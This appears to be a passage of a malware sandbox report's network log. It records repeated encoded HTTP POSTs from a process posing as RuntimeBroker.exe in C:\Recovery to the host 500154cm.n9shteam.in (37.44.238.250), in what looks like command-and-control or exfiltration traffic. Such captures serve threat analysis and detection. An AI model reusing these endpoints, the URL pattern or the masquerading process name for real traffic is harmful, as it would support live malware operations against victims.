                                                                                                            Nov 12, 2024 00:43:21.000056028 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:21.354265928 CET2512OUTData Raw: 51 54 5e 55 53 58 5c 59 5c 58 5a 51 50 5d 58 5c 5b 50 5e 50 55 58 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT^USX\Y\XZQP]X\[P^PUXZ___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.0&)95>37 ;<>="8)W'.>%>]4:+&[!"^.
                                                                                                            Nov 12, 2024 00:43:21.573817015 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:21.644499063 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:21 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            79192.168.2.44995637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:21.786375046 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:22.152319908 CET2512OUTData Raw: 51 52 5b 53 56 5c 59 58 5c 58 5a 51 50 5e 58 53 5b 5c 5e 5d 55 5f 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR[SV\YX\XZQP^XS[\^]U_ZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\']-3==;)"<%&'!4T=3-"(-U$>6*&=406(&[!"^.9
                                                                                                            Nov 12, 2024 00:43:22.351680040 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:22.429994106 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:22 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            80192.168.2.44996237.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:22.568059921 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:22.916539907 CET2512OUTData Raw: 51 54 5b 5e 56 5f 59 52 5c 58 5a 51 50 52 58 57 5b 57 5e 5f 55 5d 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[^V_YR\XZQPRXW[W^_U]Z]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$->*+!"Z90% "+?(3668%W0-)*&Y#"+%&[!"^.
                                                                                                            Nov 12, 2024 00:43:23.134171963 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:23.215133905 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:23 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            81192.168.2.44996937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:23.346074104 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:23.697978973 CET2512OUTData Raw: 51 55 5e 55 56 50 59 5e 5c 58 5a 51 50 53 58 50 5b 53 5e 59 55 54 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU^UVPY^\XZQPSXP[S^YUTZ___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.#*>+"Z6A30"8<)U95;)3=)\*"Z73%Z(&[!"^.
                                                                                                            Nov 12, 2024 00:43:23.929660082 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:24.011857986 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:23 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            82192.168.2.44997637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:24.160795927 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:24.510608912 CET2512OUTData Raw: 51 54 5b 52 53 58 59 5d 5c 58 5a 51 50 5d 58 53 5b 5c 5e 59 55 5c 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[RSXY]\XZQP]XS[\^YU\Z___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-6\)8&","0$_"(<R(#-68%'>!]=>Z 3%?5&[!"^.
                                                                                                            Nov 12, 2024 00:43:24.724399090 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:24.808634043 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:24 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            83192.168.2.44998237.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:25.204365969 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:25.557188988 CET1840OUTData Raw: 54 5f 5e 56 53 5b 5c 5a 5c 58 5a 51 50 5b 58 57 5b 50 5e 5a 55 5e 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_^VS[\Z\XZQP[XW[P^ZU^ZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-#-);!,&'%86<=3>5^%U3X1Z*%275?&[!"^.-
                                                                                                            Nov 12, 2024 00:43:25.787457943 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:25.862643957 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:25 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0d 28 13 23 13 36 05 20 54 2e 2d 26 55 32 20 28 5a 2b 16 27 00 22 2d 3f 02 2c 0d 39 56 23 10 02 5f 30 39 36 03 23 2c 21 56 2a 28 21 5b 05 12 22 02 22 2b 01 0d 3c 05 33 03 3a 57 28 03 21 23 2b 1b 2d 29 23 53 2a 00 2a 0b 27 02 29 0c 24 31 3f 07 2f 3d 3e 14 3f 3c 30 0c 36 34 2e 55 0b 11 23 50 27 06 06 08 22 2c 33 5a 26 07 24 56 36 3d 03 08 26 2a 37 0d 27 3a 23 13 31 21 39 01 26 1c 0f 00 25 39 39 1c 3e 07 3b 58 33 00 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "(#6 T.-&U2 (Z+'"-?,9V#_096#,!V*(![""+<3:W(!#+-)#S**')$1?/=>?<064.U#P'",3Z&$V6=&*7':#1!9&%99>;X3#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            84192.168.2.44998337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:25.224643946 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:25.572824001 CET2512OUTData Raw: 54 55 5b 56 56 5a 5c 5d 5c 58 5a 51 50 5e 58 51 5b 5d 5e 5a 55 5d 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU[VVZ\]\XZQP^XQ[]^ZU]ZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^9#));=R"%$,!;$(0*!-P$6*54#%+5&[!"^.9
                                                                                                            Nov 12, 2024 00:43:25.807571888 CET25INHTTP/1.1 100 Continue


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            85192.168.2.44999137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:25.998059034 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:26.354089022 CET2512OUTData Raw: 54 55 5e 52 53 5f 5c 58 5c 58 5a 51 50 52 58 5d 5b 57 5e 5b 55 54 5a 5b 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU^RS_\X\XZQPRX][W^[UTZ[__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':0^*&"6@$;6<W>9#8%>>&"75)5&[!"^.
                                                                                                            Nov 12, 2024 00:43:26.573081970 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:26.657941103 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:26 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            86192.168.2.44999737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:26.795336008 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:27.150971889 CET2512OUTData Raw: 54 52 5e 54 53 5d 5c 5f 5c 58 5a 51 50 52 58 51 5b 51 5e 5c 55 5a 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TR^TS]\_\XZQPRXQ[Q^\UZZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X-6_*1T6<&3&8Y58'>0*[#(5$%)C.\4)+&[!"^.
                                                                                                            Nov 12, 2024 00:43:27.360789061 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:27.434987068 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:27 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            87192.168.2.45000337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:27.807390928 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:28.166613102 CET2512OUTData Raw: 54 54 5e 51 56 5d 5c 5d 5c 58 5a 51 50 53 58 55 5b 52 5e 5f 55 5e 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TT^QV]\]\XZQPSXU[R^_U^ZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$,#!=1"/53 Y6;<T* 9!+)0"(&:4#6+%&[!"^.
                                                                                                            Nov 12, 2024 00:43:28.372302055 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:28.449702978 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:28 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            88192.168.2.45001437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:28.583590984 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:28.932245970 CET2512OUTData Raw: 51 52 5b 5e 56 5b 59 5b 5c 58 5a 51 50 5e 58 56 5b 55 5e 5e 55 5d 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR[^V[Y[\XZQP^XV[U^^U]Z___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X.*>=!?&%%"(#*>5$=5Y*"#05Z+%&[!"^.9
                                                                                                            Nov 12, 2024 00:43:29.166654110 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:29.247385979 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:29 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            89192.168.2.45002037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:29.398050070 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:29.744832039 CET2512OUTData Raw: 51 54 5b 54 56 5b 5c 5d 5c 58 5a 51 50 52 58 54 5b 56 5e 5b 55 54 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[TV[\]\XZQPRXT[V^[UTZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$,02^)%!&E$8!4W)U)6(0!=5\#><&[!"^.
                                                                                                            Nov 12, 2024 00:43:29.962815046 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:30.046741962 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:29 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            90192.168.2.45002637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:30.576374054 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            91192.168.2.45003037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:30.878315926 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1820
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:31.229096889 CET1820OUTData Raw: 54 55 5b 52 56 5e 59 53 5c 58 5a 51 50 5d 58 52 5b 55 5e 5e 55 54 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU[RV^YS\XZQP]XR[U^^UTZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\']-"\)"6:@'%0[!8T*#";9'%[)6&] %(&[!"^.
                                                                                                            Nov 12, 2024 00:43:31.445077896 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:31.516097069 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:31 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0a 3c 3d 30 02 20 3c 0d 0c 39 2d 26 54 26 20 38 5b 3f 38 0d 01 22 2e 12 5d 38 1d 3a 09 23 07 34 5d 24 2a 35 5a 23 06 39 51 3c 02 21 5b 05 12 22 03 37 28 2c 51 28 3c 2f 06 2c 21 33 5f 21 33 2b 16 2d 39 23 19 3e 07 26 0a 27 12 2d 0d 27 0f 23 02 39 3d 32 5f 28 2f 3b 51 22 24 2e 55 0b 11 23 54 30 38 23 1f 20 3f 23 58 26 3d 24 51 21 03 21 08 26 39 20 57 31 39 23 58 31 21 2e 11 25 0b 26 58 25 39 3d 5f 3f 29 2b 11 30 00 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "<=0 <9-&T& 8[?8".]8:#4]$*5Z#9Q<!["7(,Q(</,!3_!3+-9#>&'-'#9=2_(/;Q"$.U#T08# ?#X&=$Q!!&9 W19#X1!.%&X%9=_?)+0#Q-/V=[W


